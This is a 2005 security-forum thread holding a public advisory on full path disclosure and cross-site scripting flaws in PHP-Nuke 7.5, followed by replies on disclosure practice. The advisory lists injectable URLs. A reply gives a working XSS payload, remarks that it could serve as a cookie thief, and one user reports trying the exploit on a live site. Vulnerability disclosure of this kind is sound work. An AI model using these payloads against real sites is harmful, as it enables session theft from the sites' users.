Waraxe IT Security Portal
Login or Register
December 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 105
Members: 0
Total: 105
Full disclosure
CyberDanube Security Research 20241219-0 | Authenticated Remote Code Execution in Ewon Flexy 205
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> waraxe-2005-SA#040 - Full path disclosure and XSS in PhpNuke
Post new topicReply to topic View previous topic :: View next topic
waraxe-2005-SA#040 - Full path disclosure and XSS in PhpNuke
PostPosted: Mon Feb 14, 2005 10:20 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Author: Janek Vind "waraxe"
Date: 14. February 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-40.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular opensource content management system, written in php by
Francisco Burzi. This CMS is used on many thousands websites, because it's
freeware, easy to install and manage and has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "db/db.php":

http://localhost/nuke75/db/db.php

Fatal error: Cannot instantiate non-existent class:
sql_db in D:\apache_wwwroot\nuke75\db\db.php
on line 86


A2 - full path disclosure in "mainfile.php":

http://localhost/nuke75/index.php?inside_mod=1

Warning: main(../../config.php): failed to open stream:
No such file or directory in D:\apache_wwwroot\nuke75\mainfile.php
on line 103

Fatal error: main(): Failed opening required '../../config.php'
(include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke75\mainfile.php
on line 10


A3 - full path disclosure in "modules/Downloads/index.php":

http://localhost/nuke75/modules.php?name=Downloads&d_op=menu

error: Call to undefined function: opentable() in
D:\apache_wwwroot\nuke75\modules\Downloads\index.php on line 75



A4 - full path disclosure in "modules/Web_Links/index.php":

http://localhost/nuke75/modules.php?name=Web_Links&l_op=menu

Fatal error: Call to undefined function: opentable() in
D:\apache_wwwroot\nuke75\modules\Web_Links\index.php on line 65



B - Cross-Site Scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B1 - xss in "/modules/Downloads/index.php":

http://localhost/nuke75/modules.php?name=Downloads&d_op=NewDownloads
&newdownloadshowdays=[xss code here]


B2 - xss in "/modules/Web_Links/index.php":

http://localhost/nuke75/modules.php?name=Web_Links&l_op=NewLinks
&newlinkshowdays=[xss code here]



How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


How to fix those bugs - http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Base64 encoder and decoder - http://base64-encoder-online.waraxe.us/

SiteMapper - free php script for phpNuke powered websites -
new version 0.2 available for download - http://sitemapper.waraxe.us/


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to icenix, Raido Kerna, g0df4th3r and slimjim100!
Tervitused - Heintz!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Last edited by waraxe on Sun Feb 12, 2006 11:07 pm; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Feb 15, 2005 4:23 pm Reply with quote
MaDeRkAn
Regular user
Regular user
Joined: Feb 15, 2005
Posts: 5




Can you give me an example for xss code in here and What do I need to know xss code ? I'm beginner at this part.

_________________
NoTHinG is SeCuRe
View user's profile Send private message Visit poster's website
PostPosted: Tue Feb 15, 2005 7:13 pm Reply with quote
sp3x
Valuable expert
Valuable expert
Joined: Feb 15, 2005
Posts: 10




i have question to waraxe....

Where can i report bugs in phpnuke.... is there any mail to them ??
and also the same question but in postnuke ...

thanks for info...
View user's profile Send private message
PostPosted: Tue Feb 15, 2005 8:28 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




MaDeRkAn wrote:
Can you give me an example for xss code in here and What do I need to know xss code ? I'm beginner at this part.


Phpnuke has some countermeasures against trivial xss attacks.
I tried some attack forms and one, that works on many places:

http://www.*****.com/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=aa<body%20onload=alert(123)>

This is just proof of concept, it will not do any real "work". But
it can be used for example as cookie thief.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Feb 15, 2005 8:40 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




sp3x wrote:
i have question to waraxe....

Where can i report bugs in phpnuke.... is there any mail to them ??
and also the same question but in postnuke ...

thanks for info...


Phpnuke is unique software, because there is very big number of
the various derivations, versions, editions, patches, etc...
And if you will try to contact with Francisco Burzi himself, then you
just will not get any answer. So, if i will discover some major security
hole in most of the phpnuke versions, then what i can do - try to
contact with all of the derivations authors? Its impossible...
So in case of phpnuke i will just release public advisory to
securityfocus, secunia and other lists and patches will be coming out
soon, thats sure. Of course, many sites will get hurt because of the
phpnuke insecurity (before they will be patched), but thats the life.
Postnuke authors are far more concerned about security and
they can be contacted before public advisory, so they can develope
patch before attacks go wild. Look here :

http://waraxe.us/ftopict-18.html
View user's profile Send private message Send e-mail Visit poster's website
Hi Waraxe
PostPosted: Wed Feb 16, 2005 8:47 am Reply with quote
Zeelock
Active user
Active user
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




Developer is Francesco Burzi, not Francisco ;->

I always like your work. You should do some workshops as well.

The rest of the world should learn from you.

Cheers

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Wed Feb 16, 2005 9:31 pm Reply with quote
sp3x
Valuable expert
Valuable expert
Joined: Feb 15, 2005
Posts: 10




hmmm this is very bad...
soooo you suggest to post the bugs to bugtraq ??

with no contact phpnuke team...

i have some bugs and there are critical also

What do you suggest ??

thanks for help ...
View user's profile Send private message
PostPosted: Wed Feb 16, 2005 9:38 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




sp3x wrote:
hmmm this is very bad...
soooo you suggest to post the bugs to bugtraq ??

with no contact phpnuke team...

i have some bugs and there are critical also

What do you suggest ??

thanks for help ...


No, i suggest to try to contact with phpnuke team, of course.
What i am saing, is that i personally have bad experience with phpnuke security bugs reporting to developers. Its my personal experience and
to you i suggest to try to report security probs as by good traditions.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Feb 16, 2005 10:17 pm Reply with quote
sp3x
Valuable expert
Valuable expert
Joined: Feb 15, 2005
Posts: 10




thanks Smile
but how ??
is there any mail to them.... on their site i dont see any contact to report the bugs...
View user's profile Send private message
PostPosted: Mon Mar 14, 2005 6:42 pm Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




i'm testing this exploit on a site, the full path exploit works, but the xss injection always says "The html tags you attempted to use are not allowed", and i've tryied many way...
any idea ?
View user's profile Send private message Visit poster's website
waraxe-2005-SA#040 - Full path disclosure and XSS in PhpNuke
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds